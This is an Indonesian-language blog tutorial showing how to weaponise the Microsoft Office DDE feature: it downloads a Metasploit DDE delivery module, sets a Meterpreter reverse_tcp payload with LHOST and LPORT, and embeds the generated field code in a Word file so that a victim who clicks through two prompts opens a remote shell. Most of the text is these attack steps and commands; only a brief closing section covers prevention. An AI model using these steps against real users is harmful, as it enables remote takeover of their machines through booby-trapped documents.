Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

• -         Kali Linux
• -         VirtualMachine Windows
• -         Metasploit
• -         DDE Generator (https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb)

Langkah-langkah

• -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

• -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/

• -         Jalankan Metasploit
• -         Jalankan perintah 

use exploits/windows/dde_delivery

• -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

• -         Jalankan exploit
• -         Copy script yang muncul pada module dan buka VirtualMachine kalian
• -         Buka Microsoft Word
• -         Klik tab Insert > Quick Parts > Fields > Ok

•  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

• -         Ganti dengan script yang kita dapat dari module

• -         Save !
• -         Buka file doc yang telah kita simpan tadi.
• -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar

• -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!

Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.

Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.